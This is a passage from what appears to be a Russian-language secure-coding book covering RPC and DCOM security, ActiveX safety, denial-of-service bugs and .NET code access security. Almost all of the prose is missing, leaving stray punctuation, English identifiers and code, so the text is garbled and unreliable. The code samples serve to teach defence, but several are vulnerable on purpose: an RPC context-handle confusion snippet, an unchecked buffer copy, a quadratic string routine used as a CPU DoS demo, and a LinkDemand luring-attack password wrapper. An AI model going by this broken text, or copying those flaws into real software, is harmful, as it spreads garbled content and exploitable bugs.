, (strict
handle). DoS.
.
, . [strict_con
text_handle] ACF ,
, .
16
. 163. RPC
RPC_C_AUTH_LEVEL_PKT_PRIVACY. ,
,
423
424
III
,
. IDL,
RPC :
.
interface PrinterOperations {
typedef context_handle void *PRINTER_CONTEXT;
void OpenPrinter([in, out] PRINTER_CONTEXT *ctx);
void UsePrinter([in] PRINTER_CONTEXT ctx);
void ClosePrinter([in, out] PRINTER_CONTEXT *ctx);
}
interface FileOperations {
typedef context_handle void *FILE_CONTEXT;
void OpenFile([in, out] FILE_CONTEXT *ctx);
void UseFile([in] FILE_CONTEXT ctx);
void CloseFile([in, out] FILE_CONTEXT *ctx)
}
++ RPC:
void *ctxAttacker;
OpenPrinter(&ctxAttacker);
UseFile(ctxAttacker);
UseFile(ctxAttacker)
FILE_CONTEXT, PRINTER_CONTEXT.
16
425
ACF,
[strict_context_handle]:
[explicit_handle, strict_context_handle]
interface PrinterOperations{}
interface FileOperations{}
RPC ,
PrinterOperations FileOperations
.
.
,
RPC.
, .
,
.
, ,
.
,
, .
,
,
.
RPC ,
( ,
), ,
. , RPC
.
, ( RPC
)
, ,
, ,
.
,
, ,
,
.
426
III
(NULL)
(
), ,
DoS.
NULL, :
16
427
sErr = !1;
}
return sErr;
}
short CloseFileByID(handle_t hBinding, PPCONTEXT_HANDLE_TYPE pphCtx) {
FILE_ID *pFid = (FILE_ID *)*pphCtx;
pFid!>hFile = NULL;
midl_user_free(pFid);
*pphCtx = NULL;
return 0;
}
OpenFileByID. ,
,
. , RpcImpersonateClient Open
IDFile , pphCtx NULL.
CloseFileByID ReadFileByID,
.
RPC ,
NULL, .
if (*pphCtx == NULL) {
// .
}
RPC,
. RPC
,
, .
RPC ,
Identify ().
RpcBindingSetAuthInfoEx:
// .
RPC_SECURITY_QOS qosSec;
qosSec.Version = RPC_C_SECURITY_QOS_VERSION;
qosSec.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
qosSec.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
qosSec.ImpersonationType = RPC_C_IMP_LEVEL_IDENTIFY;
status = RpcBindingSetAuthInfoEx(..., &qosSec);
ImpersonationType :
RPC_C_IMP_LEVEL_ANONYMOUS ( ,
), RPC_C_IMP_ LEVEL_IDENTIFY (
), RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELE
428
III
GATE ( , ,
).
RPC
. RPC RpcServer
RegisterIf RpcServerRegisterIf2 RpcServerRegisterIfEx,
, ,
RPC ,
.
RPC_C_AUTHN_LEVEL_PKT .
/*
Phones.cpp
*/
...
//
// RPC!.
RPC_STATUS RPC_ENTRY SecurityCallBack(RPC_IF_HANDLE idIF, void *ctx) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
ctx,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\ n", status);
return ERROR_ACCESS_DENIED;
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
printf(" .\n");
return ERROR_ACCESS_DENIED;
}
return RPC_S_OK;
}
...
void main() {
...
16
429
status = RpcServerRegisterIfEx(phone_v1_0_s_ifspec,
NULL,
NULL,
0,
RPC_C_LISTEN_MAX_CALLS_DEFAULT,
SecurityCallBack);
...
}
MSDN Platform SDK
: <_>(RPC_IF_ID interface, void context)
<_>(RPC_IF_HANDLE interface, void context).
, RpcServer
RegisterIfEx RpcServerRegisterIf2 RPC_IF_ALLOW_SECU
RE_ONLY. :
, RPC_C_AUTHN_LEVEL_NONE.
RPC_S_ACCESS_DENIED.
. ,
, RPC
, .
,
. : Windows NT 4/2000
( ) , Windows XP
.
RPC_IF_ALLOW_SECURE_ONLY ,
RpcServerUseProtSeq,
. , ,
LRPC.
TCP/IP . ,
, .
RPC-
, RPC ,
. RPC
.
, ,
.
RPC (
, RPC),
. ,
RPC: RPC1, LRPC, RPC2,
, RPC3, LRPC,
( , LRPC )
(. 164).
430
III
MyService.exe
MyService.exe
RPC 1
RPC 2
LRPC
RPC 3
LRPC
RPC 1
, LRPC
RPC 2
RPC 3
, LRPC
, LRPC
. 164. RPC
, , , LRPC,
RPC
, RPC
!
,
, RpcBindingToStringBinding,
RpcStringBindingParse
. :
, LRPC.
/*
Phones.cpp
*/
...
BOOL IsLRPC(void *ctx) {
BOOL fIsLRPC = FALSE;
LPBYTE pBinding = NULL;
if (RpcBindingToStringBinding(ctx, &pBinding) == RPC_S_OK) {
LPBYTE pProtSeq = NULL;
// ,
// NULL.
if (RpcStringBindingParse(pBinding,
NULL,
&pProtSeq,
NULL,
NULL,
NULL) == RPC_S_OK) {
printf(" %s\n", pProtSeq);
// ,
// LRPC.
if (lstrcmpi((LPCTSTR)pProtSeq, "ncalrpc") == 0)
fIsLRPC = TRUE;
if (pProtSeq)
16
431
RpcStringFree(&pProtSeq);
}
if (pBinding)
RpcStringFree(&pBinding);
}
return flsLRPC;
}
...
,
! RPC
RpcEpRegister .
(, RPCDump.exe Windows 2000
Resource Kit) .
: ncacn_ip_tcp, ncacn_np
ncalrpc.
.
RPC , GetLastError
RPC . , ,
, 5
! .
net helpmsg nnnn, nnnn
, .
432
III
DCOM
DCOM RPC, COM
, , RPC,
. ,
, DCOM ,
, .
. , !
DCOM
Dcomcnfg.exe. Windows NT 4 Win
dows 2000 Distributed COM Configuration Properties
(: Distributed COM), Windows XP ,
COM+ DCOM. . 165
Default Properties ( )
Distributed COM Configuration Properties Windows 2000.
16
433
RPC.
Connect (), RPC_C_AUTHN_CONNECT.
Identify (),
RPC_C_IMP_LEVEL_IDENTIFY.
Default Properties Provide additional security for
reference tracking ( ).
COM.
IUnknown::AddRef, IUnknown::Release.
IUnknown::AddRef,
, , .
, COM ,
, , IUnknown::AddRef
,
. ,
? ,
, :
.
CoInitializeSecurity,
EOAC_SECURE_REFS dwCapabilities.
Default Security ( )
, .
, ,
,
, .
, DCOM
. ,
, DCOM,
.
Administrators () Power
Users ( ). , Power Users Win
dows 2000, Windows NT, ,
.
, , , , ,
. ,
. ,
: Power Users
, .
Windows NT 4 SP 4 Default Protocols (
) , DCOM.
TCP UDP
[ ConnectionOriented
TCP/IP ( TCP/IP) Datagram UDP/IP (
UDP/IP)]. DCOM
, TCP
, .
434
III
, ,
.
Applications () Distributed COM Confi
guration Properties ,
HKEY_LOCAL_MACHINE\Software\Classes\AppId. :
, .
, ,
, .
,
. :
,
DLL. ,
, DCOM
. ,
. , TCP UDP,
.
DCOM
( 135 )
, . :
Windows 2000, ,
.
DCOM
. ,
, . , ,
.
DCOM
DCOM
. : ,
, , SYS
TEM ( DCOM,
) . ,
DCOM, () ,
, .
.
DCOM .
.
,
.
,
. , :
, Windows 2000,
16
435
. DCOM
Windows NT 4.0,
. Windows 2000
,
. , ,
(window station) ,
. Platform SDK.
, ,
. ,
, DCOM
, ,
. ,
. API
.
, , DCOM
. ,
DCOM
,
,
. .
DCOM
Local System , Windows XP,
. Local System ,
.
, , .
. DCOM
, ( )
Identify.
. DCOM
Identify,
CoInitializeSecurity API
Impersonate.
, Windows .NET Server
,
7.
Microsoft Transaction Server ,
. ,
436
III
. , ,
. ,
DCOM, Log on as a batch job (
). Dcomnfg.exe
,
, .
,
.
. DCOM
. ,
? :
LSA.
: 3000 ,
. 3000 ,
. ,
,
99,9% (
1000 ). , 3000
, (0,999) 3000, 0,05.
18 ,
. ,
.
DCOM
. ,
(, ),
.
, : 20
, 3000.
.
.
,
(
). SMS (Systems Management Server)
, .
, ,
, .
! , , ,
,
. , , Windows XP Windows .NET Server
LocalService NetworkService.
.
16
437
DCOM
, . CoInitializeSecurity
,
, IlientSecurity::SetBlanket.
, COM ,
(blanket).
, CoInitializeSecurity.
HRESULT CoInitializeSecurity(
PSECURITY_DESCRIPTOR pVoid, //
LONG cAuthSvc,
// asAuthSvc
SOLE_AUTHENTICATION_SERVICE * asAuthSvc,
//
void * pReserved1,
//
DWORD dwAuthnLevel,
//
//
DWORD dwImpLevel,
//
//
SOLE_AUTHENTICATION_LIST * pAuthList,
//
//
DWORD dwCapabilities,
//
// /
void * pReserved3
//
);
.
: ,
(application ID, AppID) IAccessControl.
PSECURITY_DESCRIPTOR,
dwCapabilities. AppID, ,
. ,
,
.
( NULL). Platform SDK
( , ,
) , , NULL,
dwAuthnLevel. .
.
, cAuthSvc 1.
dwAuthnLevel,
. ,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
.
.
, .
438
III
, .
,
.
,
, !
, RPC_C_IMP_LEVEL_IDENTIFY RPC_C_IMP_LE
VEL_ANONYMOUS,
.
dwCapabilities.
EOAC_STATIC_CLOAKING EOAC_DYNAMIC_CLOAKING
Windows 2000 (loaking).
, .
.
EOAC_SECURE_REFS.
, .
Windows 2000, EOAC_NO_CUSTOM_MAR
SHAL. DCOM
DLL.
EOAC_NO_CUSTOM_MARSHAL
CLSID, Ole32.dll (Component Services).
CLSID ,
COM. DCOM
(object references, OBJREF), CLSID.
CLSID
DLL. , OAC_NO_CUS
TOM_MARSHAL, CoInitializeSecurity
CLSID, CATID_Marshaler.
EOAC_DISABLE_AAA ,
,
E_ACCESSDENIED. ,
CoInitializeSecurity,
(, Local System),
. Windows 2000
.
DCOM (.
Secureco2\Chapter16\DCOM_Security). ATL COM App
Wizard Microsoft Visual C++ 6
DCOM, ISecurityExample,
GetServerBlanket.
16
439
DWORD * ImpLevel)
{
IServerSecurity* pServerSecurity;
OLECHAR* PriName;
if(CoGetCallContext(IID_IServerSecurity,
(void**)&pServerSecurity) == S_OK)
{
HRESULT hr;
hr = pServerSecurity!>QueryBlanket(AuthNSvc,
AuthZSvc,
&PriName,
AuthLevel,
ImpLevel,
NULL,
NULL);
if(hr == S_OK)
{
CoTaskMemFree(PriName);
}
return hr;
}
else
return E_NOINTERFACE;
}
, :
, IserverSecurity
(blanket). .
TestClient ,
, IClientSecurity::SetBlanket,
, GetServerBlanket
. :
440
III
No authorization
Auth level = Packet privacy
Impersonation level = Anonymous
TestClient.exe DCOM_Secu
rity.exe . DCOM_Security.exe
DCOM_Security.exe /regserver. ,
. ,
, ,
. :
, .
DCOM , ,
Windows 2000,
. DCOM ,
. (connectable object).
(connection points) [
(Guy Eddon) (Henry Eddon) Inside Distributed COM
(Microsoft Press, 1998)] .
,
.
, .
,
Local System ,
.
(sink)
. ,
. ,
, DCOM, ,
, ,
.
.
,
( COM/DCOM).
IDispatch::Invoke .
, ,
, ,
.
ActiveX
Microsoft COM (Component Object Model)
16
441
. COM
,
IUnknown.
ActiveX COM,
IUnknown. IDispatch
(, Visual Basic Perl)
( , VBScript Jscript)
, Automation. ActiveX
,
COM,
(, Web ).
ActiveX
ActiveX
Web
. Web ActiveX
HTML ,
HTML, (,
) ActiveX
. , Outlook 2002 ( Microsoft
Office XP) ActiveX
, , , Outlook Express Windows .NET Server 2003
Windows XP.
ActiveX , ,
, HTML (
HTML)
ActiveX.
HTML ( Web ) Acti
veX ,
. , ,
(safe for initialization, SFI)
(safe for scripting, SFS),
.
ActiveX-,
ActiveX
COM IPersist.
, .
ActiveX,
, .
, ActiveX
, ,
442
III
. , ActiveX
, ,
Web.
, Microsoft Excel ,
,
.
, ActiveX
.
! ActiveX ,
Authenticode.
ActiveX
,
.
ActiveX, .
2001 . Web,
ActiveX.
, ,
. ,
, (, )
. , ActiveX Print,
! ,
, ActiveX
, Web,
,
.
, ? : Web
ActiveX,
. , Web
ActiveX Web, Print
.
, ActiveX
,
, .
Outlook View Control Exposes Unsafe Functionality (
Outlook
) (http://www.microsoft.com/technet/security/bulletin/MS01038.asp), Acti
ve Setup Control Vulnerability (
) (http://www.microsoft.com/technet/security/bulletin/MS99048.asp)
Office HTML Script and IE Script Vulnerabilities (,
HTML Office Internet
Explorer) (http://www.microsoft.com/technet/security/bulletin/MS00049.asp).
16
443
! , ActiveX,
.
,
ActiveX, .
ActiveX
, msdn.microsoft.com
safe for scripting.
!
SFI- SFS-
ActiveX,
/ , : ActiveX
!
, , ,
. , , ActiveX
, .
, ActiveX
.
! :
,
.
( )
,
.
ActiveX-?
, ActiveX, :
, .
,
, :
, ,
;
(, ,
);
,
;
;
(,
);
,
.
444
III
, ActiveX
.
,
, RunCode, PrintDoc, EraseFile, Shell, Call, Write, Read
. .
:
. ,
, ,
.
IObjectSafety.
( Internet Explorer) ,
.
(. 19).
, ActiveX
, . ,
ActiveX , Web
, northwindtraders.com.
.
1. IobjectWithSite SetSite,
(, Internet Explorer),
IUknown (
Ocidl.h). IobjectWithSite ActiveX
.
2. :
pUnk!>QueryInterface(IID_IServiceProvider, &pSP);
pSP!>QueryService(IID_IWebBrowser2, &pWB);
pWB!>getLocationURL(bstrURL);
3. , , bstrURL
URL. .
, , northwindtraders.com (,
) . ,
www.northwindtraders.com.foo.com!
InternetCrackUrl Wininet.dll,
URL ( lpUrlComponent>lpszHostName),
.
(. Secureco2\Chapter 16\InternetCrackURL)
.
/*
InternetCrackURL.cpp
*/
BOOL IsValidDomain(char *szURL, char *szValidDomain,
BOOL fRequireHTTPS) {
URL_COMPONENTS urlComp;
16
445
ZeroMemory(&urlComp, sizeof(urlComp));
urlComp.dwStructSize = sizeof(urlComp);
// .
char szHostName[128];
urlComp.lpszHostName = szHostName;
urlComp.dwHostNameLength = sizeof(szHostName);
BOOL fRet = InternetCrackUrl(szURL, 0, 0, &urlComp) ;
if (fRet==FALSE) {
printf("InternetCrackURL failed ! > %d", GetLastError());
return FALSE;
}
// HTTPS, .
if (fRequireHTTPS && urlComp.nScheme != INTERNET_SCHEME_HTTPS)
return FALSE;
// ,
// .
int cbHostName = lstrlen(szHostName);
int cbValid = lstrlen(szValidDomain);
int cbSize = (cbHostName > cbValid) ? cbValid : cbHostName;
for (int i=1; i <= cbSize; i++)
if (szHostName[cbHostName ! i] != szValidDomain[cbValid ! i])
return FALSE;
return TRUE;
}
void main() {
char *szURL="https://www.northwindtraders.com/foo/default.html";
char *szValidDomain = "northwindtraders.com";
BOOL fRequireHTTPS = TRUE;
if (IsValidDomain(szURL, szValidDomain, TRUE)) {
printf(" , %s .", szURL) ;
}
}
IsValidDomain , ActiveX
, Web,
northwindtraders.com.
,
COM msdn.microsoft.com,
Microsoft Knowledge Base, HOWTO: Tie ActiveX Controls to a
Specific Domain ( ActiveX )
(support.microsoft.com/support/kb/articles/Q196/0/61.ASP), ATL
ActiveX .
446
III
SiteLock
Windows Office
2002 . SiteLock, ATL ++,
Web .
SiteLock ActiveX
,
, ActiveX
. SiteLock
ActiveX,
.
, ActiveX
.
SiteLock
http://msdn.microsoft.com/downloads/samples/internet/components/
sitelock/default.asp.
Kill Bit
,
ActiveX . ,
ActiveX
. Web
ActiveX :
. , . HKLM\Soft
ware\Microsoft\Internet Explorer ActiveX Compatibility,
ActiveX (CLSID).
ActiveX,
( ),
CLSID , REG_DWORD
Compatibility Flags 0x00000400. , .
ActiveX
, ,
ActiveX, .
Q240797 Microsoft Knowledge Base.
17
,
DoS, ,
.
. UDP
(UDP bomb) SunOS 4.x. UDP
, ,
. ,
448
III
(, UNIX , Windows
),
.
ping (Ping of Death),
IP. DoS
. IPv4:
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
ip_len .
(unsigned short) 65 535,
65 535 . ip_offset
.
, ,
, .
0, :
, . 13
.
8 , 65 535 .
? ,
( 65 535).
,
216.
, , ping (Ping
of Death),
, , http://www.insecure.org/sploits/pingodeath.html.
,
, . ,
: ,
17
449
. , DoS,
, , ,
.
.
/*
,
*/
#include <winsock2.h>
#include <list>
using namespace std;
// .
// .
// .
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
typedef list<ip_hdr> FragList;
bool ReassemblePacket(FragList& frags, char** outbuf)
{
// , ,
// .
// ,
// .
unsigned long packetlen = 0;
// ""
// .
unsigned short last_offset;
unsigned short datalen;
ip_hdr Packet;
//
450
III
// .
// .
Packet = frags.back();
// , 8 .
// .
last_offset = (Packet.ip_offset & 0x1FFF) * 8;
// , ,
// !
datalen = Packet.ip_len ! Packet.ip_header_len * 4;
// unsigned long
// .
packetlen = (unsigned long)last_offset + (unsigned long)datalen;
// packetlen unsigned short,
// :
// offset = 0xfff0;
// datalen = 0x0020;
// total = 0x10010
// 0x0010
// true,
// unsigned short 0xffff.
if(packetlen > 0xffff)
{
// !! !
return false;
}
// .
// ...
return true;
}
:
. ,
,
Microsoft Office .
/* */
struct UNICODE_STRING
{
WCHAR* buf;
unsigned short len;
unsigned short max_len;
17
451
};
void CopyString(UNICODE_STRING* pStr)
{
WCHAR buf[20];
// ?
if(pStr!>len < 20)
{
memcpy(buf, pStr!>buf, pStr! >len * sizeof(WCHAR));
}
// ! .
}
, ,
NULL.
, . :
, . ,
RPC ,
. ,
pStr>buf NULL. ,
.
,
(
) . ,
. ,
: c:\\foo.txt
, c:\foo.txt . ,
,
? (.
Secureco2\Chapter17\CPUDoS):
/*
CPU_DoS_Example.cpp
.
.
.
*/
#include <windows.h>
#include <stdio.h>
#include <assert.h>
/*
452
III
,
.
.
true, .
*/
// , buf .
bool StripBackslash1(char* buf)
{
char* tmp = buf;
bool ret = false;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
//
// strcpy,
// !
// , .
// !
// .
strcpy(tmp, tmp+1);
ret = true;
}
}
return ret;
}
/*
.
!
,
.
*/
bool StripBackslash2(char* buf)
{
unsigned long len, written;
char* tmpbuf = NULL;
char* tmp;
bool foundone = false;
len = strlen(buf) + 1;
if(len == 1)
return false;
17
tmpbuf = (char*)malloc(len);
// , ! .
if(tmpbuf == NULL)
{
assert(false);
return false;
}
written = 0;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
// .
foundone = true;
}
else
{
tmpbuf[written] = *tmp;
written++;
}
}
if(foundone)
{
//
// strncpy
// null.
// tmp
// .
strncpy(buf, tmpbuf, written);
buf[written] = '\0';
}
if(tmpbuf != NULL)
free(tmpbuf);
return foundone;
}
int main(int argc, char* argv[])
{
char* input;
char* end = "foo";
DWORD tickcount;
int i, j;
// .
for(i = 10; i < 10000001; i *= 10)
453
454
III
{
input = (char*)malloc(i);
if(input == NULL)
{
assert(false);
break;
}
// .
// , "foo".
// 2 input[j],
// "foo\0".
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash1(input);
printf("StripBackslash1: = %d , = %d \n",
i, GetTickCount() ! tickcount);
// !
// .
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash2(input);
printf("StripBackslash2: = %d , = %d \n",
i, GetTickCount() ! tickcount);
free(input);
}
return 0;
}
17
455
CPU_DoS_Example.cpp
. main
. StripBackslash1
,
:
. StripBackslash2
,
,
. . 171 .
17-1. CPU_DoS_Example.cpp
StripBackslash1,
StripBackslash2,
10
100
1000
10 000
111
100 000
11 306
1 000 000
2 170 160
20
, ,
10 000 . 1 . ,
36 Pentium III ( 800 ).
,
.
,
StripBackslash2 ,
. ,
.
GetTickCount 0
1 . ,
,
, .
StripBackslash1 StripBackslash2
,
. Strip
Backslash2 ,
. ,
,
DoS.
. ,
, ,
, DoS.
StripBackslash3.
456
III
17
457
, , (
) , ,
,
. , ,
, Profiler.
Visual Studio 6 Project
Settings Link. Category
General, Enable Profiling OK.
Profile.
, 1000 ( ,
, ), , :
Program Statistics
458
III
slash2.
100 ,
. , 10 , StripBack
slash2 StripBackslash1.
100 StripBackslash2 StripBackslash1.
,
, ,
.
,
.
DoS. , ,
, StripBackslash3,
StripBackslash2 StripBackslash3 (. 172).
17-2.
StripBackslash2 StripBackslash3
StripBackslash2, %
StripBackslash3, %
1000
2,5
1,9
1,32
10 000
16,7
14,6
1,14
100 000
33,6
23,3
1,44
1 000 000
46,6
34,2
1,36
. , StripBackslash2 .
,
,
.
,
. , .
,
,
. ,
, :
DoS ,
.
Profiler Visual Studio .NET,
Web http://
go.microsoft.com/fwlink/?Linkid=7256.
, ,
Compuware.
17
459
,
.
.
new, ,
. :
, InitializeCriticalSection EnterCriticalSection,
Windows XP/.NET Server EnterCriticalSection . :
, .
(David Meltzer) ,
Internet Security Systems. ,
Windows NT 4 Terminal Server Edition
( Microsoft Knowledge Base
http://support.microsoft.com/support/kb/articles/
Q238/6/00.ASP). ,
,
. Terminal Server (
, ),
( )
.
,
, .
,
.
,
. ,
.
. Windows NT
LSA LSA_HANDLE.
,
LSA, .
2048 LSA,
.
LSA ,
. ,
.
, , ;
, .
:
460
III
, , ,
.
.
,
. : ,
.
,
.
, ,
;
, .
! ?
.
? ,
Terminal Services
,
. ,
.
. : IPv6
IP, .
IPv4 IPv6
, .
. , ,
.
, ,
. ,
, .
,
, .
SYN (SYN flood) Microsoft:
, , ,
.
Microsoft [ SMB (Server Message Block) NetBIOS]
. ,
.
. , ,
.
, ,
, .
TLS (Transport Level Security),
, 2001 USENIX
Security Conference. Using Client Puzzles to Protect TLS
(Drew Dean) Xerox PARC
17
461
,
, ,
, echo chargen
( ). ,
.
. UDP,
TCP. , ,
chargen, echo
?
, echo chargen.
,
,
,
. ,
, chargen echo,
Windows NT 4 Windows,
. ,
, ,
chargen.
chargen echo
( 1024), .
, ,
, UDP 135
Windows NT Windows NT.
RPC (RPC endpoint mapping service).
,
. , ,
.
. ,
.
.
462
III
DoS
.
,
. ,
,
,
. , ,
,
, , ICMP (Internet Control Message Protocol) UDP.
,
, .
DoS,
.
.
, ,
,
DoS
.
. ,
.
.
,
. ,
, ,
.
18
.NET
. Microsoft
Professional Developers Conference ( 2001 .),
, ,
.NET Framework .
, SQL,
C++ C#, , .
(
C C++) ,
,
. ,
.NET.
? , Microsoft
.NET, ,
,
. ,
, ,
CLR (Common Language Runtime), Web XML.
,
, , :
(web.config);
, System. Security. Cryp
tography;
, .
464
III
CLR .NET ,
,
, ActiveX.
Microsoft Windows
. ,
,
, .
(restricted token) Windows 2000
( 7).
.NET :
,
(
) ,
.
, ,
. , (
,
) ,
, .
Web:
Web (, )
, . .NET
. ,
, Web.
,
, ,
.NET,
. ,
, .
.
: . !
.NET ,
.
! CLR , ,
.
, .
,
(Code Access Security, CAS) .NET.
18 .NET
465
,
.NET CLR. , ,
. ,
, .NET Framework Security (.
).
, CAS
: . :
, ,
(. 181).
,
?
. 181.
,
?
: ,
,
.
. , (. 182).
,
,
. 182. , ,
,
, CAS!
CAS. . 183.
466
III
,
?
,
,
. 183.
CAS
,
, ,
, . . 184,
CAS.
Assert()
Deny()
PermitOnly()
, ,
,
1990
. 184.
, CAS,
, .
: FxCop
, FxCop (
http://www.gotdotnet.com),
. FxCop ,
18 .NET
467
<?xml version=1.0"?>
:
. 185.
FxCop
, FxCop
.
.
.
excel.exe, ? . ,
468
III
, ,
, Microsoft Excel. ,
Microsoft Excel? .NET
,
, ,
.
,
sn.exe. :
SN !k keypair.snk
keypair.snk ,
. (
; ,
.)
,
, .
, ,
, Authenticode. ,
, .
, .
, , ,
.
, ,
,
, , ,
.
Authen
ticode, .
, Authenticode.
, Authenticode
, , .
! ,
,
.
,
.
1024
RSA.
:
SN !p keypair.snk public.snk
, .
, ,
:
18 .NET
469
[assembly: AssemblyKeyFile(<____>)]
Visual Studio .NET
AssemblyInfo.cs AssemblyInfo.vb. Visual Basic .NET :
Imports System.Reflection
<Assembly: AssemblyKeyFileAttribute("c:\keys\keypair.snk")>
,
.
, ,
, . ,
:
SN !R <_>.dll keypair.snk
, .
:
SN !Vr <_>.dll
! ,
.
, Visual Basic .NET
:
<Assembly: AssemblyDelaySignAttribute(true)>
C# :
[assembly: AssemblyDelaySign(true)]
,
.
ASP.NET
, Web,
(global assembly cache, GAC)
.NET Configuration (Mscor
cfg.msc) gacutil.exe.
ASP.NET.
, CLR .NET
, .
,
. De
mand, CLR , ,
470
III
. .
(stack walk).
, ,
,
, .
?
.NET.
, ,
, , ,
.
.
,
, .
,
.
, .
, ,
.
, .
, FileIOPermission
, :
[assembly: FileIOPermission(SecurityAction.RequestMinimum,
Read = @"c:\files\inventory.xml")]
.
RequestMinimum.
, Policy
Exception .
,
, ,
. ,
,
:
18 .NET
471
, , ,
( ),
.
CLR
, , ,
.
.
,
FileIOPermission.
,
. :
, , ,
C# Visual Basic .NET .
(declarative permissions).
.
(imperative permissions)
.
, :
new FileIOPermission(FileIOPermissionAccess.Read,
@"c:\files\inventory.xml").Demand();
,
XML.
,
.
.
.
Permissions View (permview);
472
III
/decl.
,
.
,
.
Assert
Assert CLR
, ,
. Assert, : ,
. ,
.
! CLR CodeAccessPermission.Assert
assert C C++ Debug.Assert
.NET Framework.
, .
,
, / . ,
,
.
, : ,
. Assert ,
. ,
USB, UsbFileStream FileStream.
, USB API Win32, ,
, / (FileIOPermission).
UsbFileStream UnmanagedCode ( Win32
API) FileIOPermission, ,
/.
, (
, ) , .
, ../../boot.ini?
? , ,
18 .NET
473
(ACL) ,
FAT.
Assert, , , Assert
Demand Demand, . ,
.
,
.
! ,
SecurityPermissionFlag.Un
managedCode;
.
Demand Assert
Demand Assert
.
, ,
, . :
,
, SecurityPermissionFlag.Assertion.
.
, FileIOPermission,
, .
FileIOPermission, ,
.
, Demand
.
EmailAlertPermission,
. ,
.
! ,
Demand, . ,
Main ,
, .
,
Demand
*, SecurityManager. IsGranted,
. . .
474
III
, (
).
Main,
! ,
,
.
!
, .
. , Environ
mentPermission Environment . GetEnvironmentVariable,
.NET Framework .
, .
,
, ,
EmailAlertPermission (
), , SMTP,
SocketPermission.
,
, SocketPermission.
UnmanagedCode
.
,
, ,
.
UnmanagedCode? .
, .
:
.
FileIOPermission .
:
, , .
.
SecurityPermission. :
[SecurityPermission(SecurityAction.Assert,UnmanagedCode=true)]
Assert .
, ,
, :
try {
PermissionSet ps =
new PermissionSet(PermissionState.Unrestricted);
18 .NET
475
ps.AddPermission(new FileDialogPermission
(FileDialogPermissionAccess.Open));
ps.AddPermission(new FileIOPermission
(FileIOPermissionAccess.Read,@"c:\files"));
ps.Assert();
} catch (SecurityException e) {
// ! .
}
, ,
CodeAccessPermission. RevertAssert, ,
Assert.
; , ,
.
C# , ,
.
,
SMTP,
.
using
using
using
using
System;
System.Net;
System.Security;
System.Security.Permissions;
// ;
// .
static void SendAlert(string alert) {
//
// .
new EmailAlertPermission(
EmailAlertPermission.Send).Demand();
//
// SMTP!.
NetworkAccess na = NetworkAccess.Connect;
TransportType type = TransportType.Tcp;
string host = "mail.northwindtraders.com";
int port = 25;
new SocketPermission(na, type, host, port).Assert();
try {
SendAlertTo(host, port, alert);
} finally {
// ,
476
III
CodeAccessPermission.RevertAssert();
}
}
Assert, Deny PermitOnly ,
Deny, Assert
PermitOnly.
, A() B(),
C(), A() ReflectionPermission.
C() ReflectionPermission , ,
, . ? , ,
Assert,
A(). , .
Demand LinkDemand
,
. .NET Framework
, ,
, . ,
System . IO. File FileIOPermission
18 .NET
477
. FileIOPermission File,
.
,
.
LinkDemand JIT
(justintime)
. ,
.
LinkDemand ,
(luring atack),
. LinkDemand ,
,
. .
- LinkDemand
. .
[PasswordPermission(SecurityAction.LinkDemand, Unrestricted=true)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\AccountingApplication")]
public string returnPassword() {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\AccountingApplication\")
.GetValue("Password");
}
...
public string returnPasswordWrapper() {
return returnPassword();
}
, , ,
, ,
. returnPassword,
PasswordPermission. returnPassword,
,
. returnPasswordWrapper
LinkDemand returnPasswordWrapper
returnPassword
returnPassword, . ! ,
returnPasswordWrapper, .
LinkDemand JIT
,
, .
: LinkDemand
. ,
. ,
478
III
LinkDemand,
, ,
.
, , LinkDemand
? ,
LinkDemand , ,
.
! LinkDemand
(reflection) (
, ,
)
.
,
.
LinkDemand
,
Demand.
,
, .
SuppressUnmanagedCodeSecurityAttribute:
,
.
SuppressUnmanagedCodeSecurityAttribute , ,
. Demand LinkDemand,
.
,
Win32, .
MyWin32Funtion SuppressUnmanagedCode
SecurityAttribute.
using System.Security;
using System.Runtime.InteropServices;
...
public class MyClass {
...
[SuppressUnmanagedCodeSecurityAttribute()]
[DllImport("MyDLL.DLL")]
private static extern int MyWin32Function(int i);
public int DoWork() {
18 .NET
479
return MyWin32Function(0x42);
}
}
, .
! , , , LinkDemand SuppressUnmanagedCode
SecurityAttribute :
.
, ,
.
SuppressUnmanagedCodeSecurity,
: , ,
(private) (internal)
.
, ( ,
MarshalByRefObject) ,
, , Demand, LinkDemand InheritanceDemand, .
, ,
SOAP, Web.
. ,
.
, , ,
.
, , ,
.
; ,
. ,
, ; , ,
. :
protected, .
, ,
, , , C++.
(sealed) ( Visual Basic
NotInheritable), , .
.
. :
, .
.
480
III
,
.
. InheritanceDemand
, ,
,
. , ,
, EnvironmentPermission:
[EnvironmentPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public class Carol {
...
}
class Brian : Carol {
...
}
